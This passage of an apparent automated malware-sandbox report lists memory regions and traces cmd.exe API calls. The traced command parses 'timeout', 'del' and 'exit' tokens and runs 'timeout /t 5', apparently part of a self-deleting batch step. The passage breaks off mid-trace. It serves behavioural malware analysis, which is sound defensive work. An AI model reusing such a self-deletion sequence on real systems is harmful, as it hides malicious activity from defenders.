= 3118 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3119 start_va = 0xf40000 end_va = 0xf91fff monitored = 1 entry_point = 0xf54fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3120 start_va = 0xfa0000 end_va = 0x4f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 3121 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3122 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3123 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3124 start_va = 0x7fff0000 end_va = 0x7dfa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3125 start_va = 0x7dfa16770000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa16770000" filename = "" Region: id = 3126 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3127 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 3160 start_va = 0x400000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3161 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3162 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3163 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3164 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3169 start_va = 0x590000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3170 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3171 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3172 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3173 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3279 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3280 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3281 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3282 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3283 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3284 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3285 start_va = 0x7b0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 3286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3295 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3296 start_va = 0x9a0000 end_va = 0xcd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 169 os_tid = 0x10dc [0185.451] GetProcAddress (hModule=0x76720000, lpProcName="SetConsoleInputExeNameW") returned 0x76a2b440 [0185.451] GetProcessHeap () returned 0x6b0000 [0185.451] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400a) returned 0x6bb738 [0185.451] GetProcessHeap () returned 0x6b0000 [0185.452] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bb738) returned 1 [0185.453] _wcsicmp (_String1="timeout", _String2=")") returned 75 [0185.453] _wcsicmp (_String1="FOR", _String2="timeout") returned -14 [0185.453] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14 [0185.453] _wcsicmp (_String1="IF", _String2="timeout") returned -11 [0185.453] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11 [0185.453] _wcsicmp (_String1="REM", _String2="timeout") returned -2 [0185.453] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2 [0185.453] GetProcessHeap () returned 0x6b0000 [0185.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6b8fe8 [0185.453] GetProcessHeap () returned 0x6b0000 [0185.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6b7a70 [0185.453] GetProcessHeap () returned 0x6b0000 [0185.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x16) returned 0x6b76d0 [0185.454] GetProcessHeap () returned 0x6b0000 [0185.454] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6b9048 [0185.454] _wcsicmp (_String1="del", _String2=")") returned 59 [0185.454] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0185.454] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0185.454] _wcsicmp (_String1="IF", _String2="del") returned 5 [0185.454] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0185.454] _wcsicmp (_String1="REM", _String2="del") returned 14 [0185.454] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0185.454] GetProcessHeap () returned 0x6b0000 [0185.454] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6b90a8 [0185.454] GetProcessHeap () returned 0x6b0000 [0185.454] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x10) returned 0x6b0578 [0185.456] GetProcessHeap () returned 0x6b0000 [0185.456] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x78) returned 0x6b9108 [0185.456] GetProcessHeap () returned 0x6b0000 [0185.456] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6b9188 [0185.457] _wcsicmp (_String1="exit", _String2=")") returned 60 [0185.457] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0185.457] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0185.457] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0185.457] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0185.457] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0185.457] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0185.457] GetProcessHeap () returned 0x6b0000 [0185.457] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x58) returned 0x6b91e8 [0185.457] GetProcessHeap () returned 0x6b0000 [0185.457] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x12) returned 0x6b7770 [0185.458] GetConsoleTitleW (in: lpConsoleTitle=0x19fa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0185.458] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0185.458] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0185.458] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0185.458] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0185.458] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0185.458] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0185.459] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0185.459] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0185.459] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0185.459] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0185.459] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0185.459] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0185.459] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0185.459] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0185.459] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0185.459] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0185.459] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0185.459] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0185.459] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0185.459] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0185.459] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0185.459] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0185.459] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0185.459] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0185.459] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0185.459] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0185.459] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0185.459] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0185.459] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0185.459] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0185.459] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0185.459] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0185.459] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0185.459] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0185.459] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0185.459] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0185.459] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0185.459] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0185.460] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0185.460] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0185.460] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0185.460] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0185.460] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0185.460] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0185.460] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0185.460] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0185.460] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0185.460] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0185.460] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0185.460] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0185.460] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0185.460] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0185.460] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0185.460] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0185.460] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0185.460] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0185.460] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0185.460] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0185.460] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0185.460] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0185.460] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0185.460] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0185.460] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0185.460] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0185.460] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0185.460] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0185.461] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0185.461] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0185.461] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0185.461] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0185.461] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0185.461] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0185.461] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0185.461] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0185.461] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0185.461] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0185.461] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0185.461] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0185.461] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0185.461] _wcsicmp (_String1="timeout", _String2="FOR") returned 14 [0185.461] _wcsicmp (_String1="timeout", _String2="IF") returned 11 [0185.461] _wcsicmp (_String1="timeout", _String2="REM") returned 2 [0185.461] GetProcessHeap () returned 0x6b0000 [0185.461] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6b9248 [0185.461] GetProcessHeap () returned 0x6b0000 [0185.461] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x26) returned 0x6b9460 [0185.461] _wcsnicmp (_String1="time", _String2="cmd ", _MaxCount=0x4) returned 17 [0185.462] GetProcessHeap () returned 0x6b0000 [0185.462] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6b05c8 [0185.462] SetErrorMode (uMode=0x0) returned 0x0 [0185.462] SetErrorMode (uMode=0x1) returned 0x0 [0185.462] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b05d0, lpFilePart=0x19f51c | out: lpBuffer="C:\\ProgramData", lpFilePart=0x19f51c*="ProgramData") returned 0xe [0185.462] SetErrorMode (uMode=0x0) returned 0x1 [0185.462] GetProcessHeap () returned 0x6b0000 [0185.462] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b05c8, Size=0x36) returned 0x6b05c8 [0185.462] GetProcessHeap () returned 0x6b0000 [0185.462] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b05c8) returned 0x36 [0185.462] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0185.462] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.463] GetProcessHeap () returned 0x6b0000 [0185.463] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xf2) returned 0x6b0608 [0185.463] GetProcessHeap () returned 0x6b0000 [0185.463] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1dc) returned 0x6b0708 [0185.472] GetProcessHeap () returned 0x6b0000 [0185.472] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0708, Size=0xf4) returned 0x6b0708 [0185.472] GetProcessHeap () returned 0x6b0000 [0185.472] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0708) returned 0xf4 [0185.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0185.472] GetProcessHeap () returned 0x6b0000 [0185.472] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe0) returned 0x6b9490 [0185.475] GetProcessHeap () returned 0x6b0000 [0185.475] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b9490, Size=0x76) returned 0x6b9490 [0185.475] GetProcessHeap () returned 0x6b0000 [0185.475] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b9490) returned 0x76 [0185.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.476] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\timeout.*" (normalized: "c:\\programdata\\timeout.*"), fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0185.476] GetLastError () returned 0x2 [0185.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.*" (normalized: "c:\\windows\\syswow64\\timeout.*"), fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6b9510 [0185.476] GetProcessHeap () returned 0x6b0000 [0185.476] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6b79b0 [0185.476] FindClose (in: hFindFile=0x6b9510 | out: hFindFile=0x6b9510) returned 1 [0185.477] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.COM" (normalized: "c:\\windows\\syswow64\\timeout.com"), fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0xffffffff [0185.477] GetLastError () returned 0x2 [0185.477] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\timeout.EXE" (normalized: "c:\\windows\\syswow64\\timeout.exe"), fInfoLevelId=0x1, lpFindFileData=0x19f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f2a8) returned 0x6b9510 [0185.477] GetProcessHeap () returned 0x6b0000 [0185.477] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b79b0, Size=0x4) returned 0x6b0590 [0185.477] FindClose (in: hFindFile=0x6b9510 | out: hFindFile=0x6b9510) returned 1 [0185.477] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.477] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.477] GetConsoleTitleW (in: lpConsoleTitle=0x19f79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0185.478] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f6ac | out: lpAttributeList=0x19f6c8, lpSize=0x19f6ac) returned 1 [0185.478] UpdateProcThreadAttribute (in: lpAttributeList=0x19f6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f6c8, lpPreviousValue=0x0) returned 1 [0185.478] GetStartupInfoW (in: lpStartupInfo=0x19f700 | out: lpStartupInfo=0x19f700*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0185.478] GetProcessHeap () returned 0x6b0000 [0185.478] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x18) returned 0x6b77f0 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.478] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0185.479] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0185.483] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0185.483] GetProcessHeap () returned 0x6b0000 [0185.483] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b77f0) returned 1 [0185.483] GetProcessHeap () returned 0x6b0000 [0185.483] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa) returned 0x6b9510 [0185.483] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.530] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout /t 5 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\ProgramData", lpStartupInfo=0x19f650*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="timeout /t 5 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f69c | out: lpCommandLine="timeout /t 5 ", lpProcessInformation=0x19f69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcc8, dwThreadId=0xcc0)) returned 1 [0185.937] CloseHandle (hObject=0xa4) returned 1 [0185.937] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.937] GetProcessHeap () returned 0x6b0000 [0185.937] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6babe8) returned 1 [0185.937] GetEnvironmentStringsW () returned 0x6ba098* [0185.937] GetProcessHeap () returned 0x6b0000 [0185.937] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb42) returned 0x6babe8 [0185.937] memcpy (in: _Dst=0x6babe8, _Src=0x6ba098, _Size=0xb42 | out: _Dst=0x6babe8) returned 0x6babe8 [0185.937] FreeEnvironmentStringsA (penv="=") returned 1 [0185.937] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0191.525] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f634 | out: lpExitCode=0x19f634*=0x0) returned 1 [0191.525] CloseHandle (hObject=0xa8) returned 1 [0191.525] _vsnwprintf (in: _Buffer=0x19f71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f63c | out: _Buffer="00000000") returned 8 [0191.526] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.526] GetProcessHeap () returned 0x6b0000 [0191.527] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6babe8) returned 1 [0191.527] GetEnvironmentStringsW () returned 0x6ba098* [0191.527] GetProcessHeap () returned 0x6b0000 [0191.527] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb68) returned 0x6bc2a8 [0191.527] memcpy (in: _Dst=0x6bc2a8, _Src=0x6ba098, _Size=0xb68 | out: _Dst=0x6bc2a8) returned 0x6bc2a8 [0191.527] FreeEnvironmentStringsA (penv="=") returned 1 [0191.527] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.527] GetProcessHeap () returned 0x6b0000 [0191.527] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bc2a8) returned 1 [0191.527] GetEnvironmentStringsW () returned 